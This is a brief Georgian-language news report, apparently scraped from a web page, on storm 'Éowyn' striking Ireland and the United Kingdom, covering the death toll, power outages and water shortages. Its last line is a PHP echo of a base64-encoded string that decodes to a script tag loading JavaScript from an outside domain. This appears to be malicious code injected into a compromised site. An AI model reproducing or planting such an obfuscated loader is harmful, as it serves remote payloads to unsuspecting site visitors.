tube
ავერსი jaluzi

ირლანდიასა და გაერთიანებულ სამეფოს შტორმმა „იოვინსმა“ გადაუარა. ქარის სიჩქარე საათში 160 კმ-ს აღწევს. შტორმის შედეგად დაღუპულია ერთი ადამიანი – ირლანდიის მკვიდრი მამაკაცი, რომლის ავტომობილსაც ძლიერი ქარისგან მოგლეჯილი ხე დაეცა.

სტიქიამ ელექტროენერგიის გარეშე დატოვა მილიონამდე აბონენტი გაერთიანებულ სამეფოში, სადაც განგაშის წითელი დონე იყო გამოცხადებული.

ირლანდიაში სასმელი წყლის გარეშეა დარჩენილი 1 800-მდე მოსახლე. ადგილობრივ ხელისუფლებაში ამბობენ, რომ აბონენტთა ნაწილს ელექტროენერგიის მიწოდება, შესაძლოა, უახლოესი ათი დღის განმავლობაში ვერ აღუდგინონ.

79
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");